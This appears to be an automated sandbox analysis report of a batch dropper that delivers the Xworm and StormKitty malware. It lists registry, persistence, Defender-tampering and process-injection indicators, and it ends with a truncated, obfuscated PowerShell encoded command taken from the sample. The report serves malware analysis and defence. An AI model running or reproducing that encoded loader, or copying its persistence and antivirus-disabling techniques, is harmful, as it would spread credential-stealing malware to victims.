Analysis Overview
SHA256
caef8631cfa691871889f8f211d50823d55f06227b0c3d3ab619ef83d70c147a
Threat Level: Known bad
The file NightyBatchDropper.bat was found to be: Known bad.
Malicious Activity Summary
Xworm
StormKitty payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies Windows Defender Real-time Protection settings
Contains code to disable Windows Defender
Detect Xworm Payload
StormKitty
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops desktop.ini file(s)
Looks up external IP address via web service
Sets desktop wallpaper using registry
Suspicious use of SetThreadContext
Launches sc.exe
Enumerates physical storage devices
Creates scheduled task(s)
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Runs net.exe
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Checks processor information in registry
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-07 16:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-07 16:46
Reported
2024-05-07 17:16
Platform
win11-20240419-en
Max time kernel
1792s
Max time network
1798s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2308 created 700 | N/A | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | C:\Windows\system32\lsass.exe |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSC.lnk | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSC.lnk | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowSC = "C:\\Users\\Admin\\AppData\\Roaming\\WindowSC.exe" | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2878097196-921257239-309638238-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2308 set thread context of 2976 | N/A | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Key created | \Registry\User\S-1-5-21-2878097196-921257239-309638238-1000_Classes\NotificationData | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
Runs net.exe
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NightyBatchDropper.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoExit -encodedCommand JABoAGUAaABlAGgAZQAgAD0AIAAiAGQAaQBFAGcATQBYAEoAdgBjAGgASgB3AFgAMQBnAG4ASQBUAHMAOABOAFgASQBCAEsAeQBFAG0ATgB6ADkAcABYADEAZwBuAEkAVABzADgATgBYAEkAQgBLAHkARQBtAE4AegA5ADgAQQBDAGMAOABKAGoAcwAvAE4AMwB3AGIAUABDAFkAMwBJAEQAMABpAEEAVABjAGcASgBEAHMAeABOAHkARgBwAFgAMQBnAG4ASQBUAHMAOABOAFgASQBCAEsAeQBFAG0ATgB6ADkAOABCAGoAbwBnAE4AegBNADIATwB6AHcAMQBhAFYAOQBZAFgAMQBnAGkASgB6AEEAKwBPAHoARgB5AE0AVAA0AHoASQBTAEYAeQBBAGoATQBtAE0AVABwAGYAVwBDAGwAZgBXAEgASgB5AGMAbgBJAEoARgBqADQAKwBHAHoAOABpAFAAUwBBAG0AZQBuAEEANQBOAHkAQQA4AE4AegA1AGgAWQBIAEIANwBEADEAOQBZAGMAbgBKAHkAYwBpAEkAbgBNAEQANAA3AE0AWABJAGgASgBqAE0AbQBPAHoARgB5AE4AeQBvAG0ATgB5AEEAOABjAGgAcwA4AEoAZwBJAG0ASQBIAEkAVgBOAHkAWQBDAEkARAAwAHgARQB6AFkAMgBJAEQAYwBoAEkAWABvAGIAUABDAFkAQwBKAGkAQgB5AE8AaAA4ADkATgBpAGMAKwBOADMANQB5AEkAUwBZAGcATwB6AHcAMQBjAGkASQBnAFAAVABFAGMATQB6ADgAMwBlADIAbABmAFcASABKAHkAYwBuAEkASgBGAGoANAArAEcAegA4AGkAUABTAEEAbQBlAG4AQQA1AE4AeQBBADgATgB6ADUAaABZAEgAQgA3AEQAMQA5AFkAYwBuAEoAeQBjAGkASQBuAE0ARAA0ADcATQBYAEk